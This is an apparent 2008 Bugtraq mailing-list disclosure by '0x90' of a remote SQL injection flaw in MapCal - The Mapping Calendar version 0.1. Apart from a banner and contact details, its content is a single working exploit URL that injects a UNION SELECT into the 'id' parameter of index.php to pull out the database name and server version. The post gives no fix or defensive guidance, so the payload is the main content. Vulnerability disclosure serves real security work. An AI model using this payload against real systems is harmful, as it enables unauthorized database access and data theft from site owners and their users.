
Date: 21 Sep 2008 03:00:40 -0000
From: Guns@...0.com.ar
To: bugtraq@...urityfocus.com
Subject: MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

       _____          ____   _____
      /  _  \ /\  /\ / _  \ /  _  \
      | | | | \ \/ / ||_| | | | | |  
      | | | |  \  /  \_   | | | | |  
      | |_| |  /  \   __\ | | |_| |
      \_____/ / /\ \ |____/ \_____/
              \/  \/

[~] MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: MapCal - The Mapping Calendar

[~] site: http://mapcal.sourceforge.net

[~] Vulnerability Class: SQL Injection



[~] Exploit:

http://localhost/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events
